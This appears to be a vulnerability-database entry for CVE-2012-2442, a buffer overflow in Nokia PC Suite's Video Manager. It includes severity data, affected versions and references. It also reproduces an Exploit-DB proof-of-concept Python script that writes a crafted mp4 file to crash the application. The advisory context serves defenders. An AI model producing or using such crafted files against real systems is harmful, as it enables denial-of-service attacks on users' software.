CVE-2012-2442
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
5.3
Description
Buffer overflow in the Video Manager in Nokia PC Suite 7.1.180.64 and earlier allows remote attackers to cause a denial of service via a crafted mp4 file.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Nokia PC Suite Video Manager 7.1.180.64 - '.mp4' Denial of Service
###########################################################################################################
Application : Nokia PC Suite Video Manager DoS
Versions : <= 7.1.180.64
Date : Friday, April 27,2012
Auther : Senator of Pirates
E-Mail : SenatorofPirates.info@gmail.com
FaceBook : /SenatorofPiratesInfo
Greetz : i greet to my best friends and every moroccan
###########################################################################################################
PoC :
-----
Data = ("\x00\x00\x00\x1c\x66\x74\x79\x70\x6d\x70\x34\x32\x00\x00\x00\x00\x69\x73\x6f\x6d\x61\x76\x63\x31\x6d\x70\x34\x32\x00\x01\x19\x28"
"\x6d\x6f\x6f\x76\x00\x00\x00\x6c\x6d\x76\x68\x64\x00\x00\x00\x00\xc7\x21\xfc\x5b\xc7\x21\xfc\x5b\x00\x00\x02\x58\x00\x02\x22\xa8"
"\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x15\x69\x6f\x64\x73\x00\x00\x00\x00\x10\x07\x00\x4f"
"\xff\xff\x29\x15\xff\x00\x00\xa5\xe5\x74\x72\x61\x6b\x00\x00\x00\x5c\x74\x6b\x68\x64\x00\x00\x00\x01\xc7\x21\xfc\x5b\xc7\x21\xfc"
"\x5b\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x22\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00"
"\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\xa5\x81\x6d\x64\x69\x61\x00\x00\x00\x20\x6d\x64\x68\x64\x00\x00\x00\x00\xc7\x21\xfc"
"\x5b\xc7\x21\xfc\x5b\x00\x00\xac\x44\x00\x9c\xf0\x00\x55\xc4\x00\x00\x00\x00\x00\x42\x68\x64\x6c\x72\x00\x00\x00\x00\x00\x00\x00"
"\x00\x73\x6f\x75\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x43\x29\x20\x32\x30\x30\x37\x20\x47\x6f\x6f\x67\x6c\x65"
"\x20\x49\x6e\x63\x2e\x20\x76\x30\x38\x2e\x31\x33\x2e\x32\x30\x30\x37\x2e\x00\x00\x00\xa5\x17\x6d\x69\x6e\x66\x00\x00\x00\x10\x73"
"\x6d\x68\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x64\x69\x6e\x66\x00\x00\x00\x1c\x64\x72\x65\x66\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x0c\x75\x72\x6c\x20\x00\x00\x00\x01\x00\x00\xa4\xdb\x73\x74\x62\x6c\x00\x00\x00\x5b\x73\x74\x73\x64\x00"
"\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x4b\x6d\x70\x34\x61\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x10\x00\x00\x00\x00\xac\x44\x00\x00\x00\x00\x00\x27\x65\x73\x64\x73\x00\x00\x00\x00\x03\x19\x00\x00\x00\x04\x11\x40\x15"
"\x00\x01\xe6\x00\x02\x2d\x38\x00\x01\xcd\x28\x05\x02\x12\x10\x06\x01\x02\x00\x00\x00\x18\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x27\x3c\x00\x00\x04\x00\x00\x00\x00\x28\x73\x74\x73\x63\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00");
avi = open('poc.mp4', 'wb+')
avi.write(Data)
avi.close()
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| nokia | pc_suite | {"endIncluding":"7.1.180.64"} | |
References
- http://osvdb.org/81498
- http://packetstormsecurity.org/files/112295/Nokia-CP-Suite-Video-Manager-7.1.180.64-Denial-Of-Service.html
- http://www.exploit-db.com/exploits/18795
- http://www.securityfocus.com/bid/53290
- https://exchange.xforce.ibmcloud.com/vulnerabilities/75235
- http://osvdb.org/81498
- http://packetstormsecurity.org/files/112295/Nokia-CP-Suite-Video-Manager-7.1.180.64-Denial-Of-Service.html
- http://www.exploit-db.com/exploits/18795
- http://www.securityfocus.com/bid/53290
- https://exchange.xforce.ibmcloud.com/vulnerabilities/75235
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.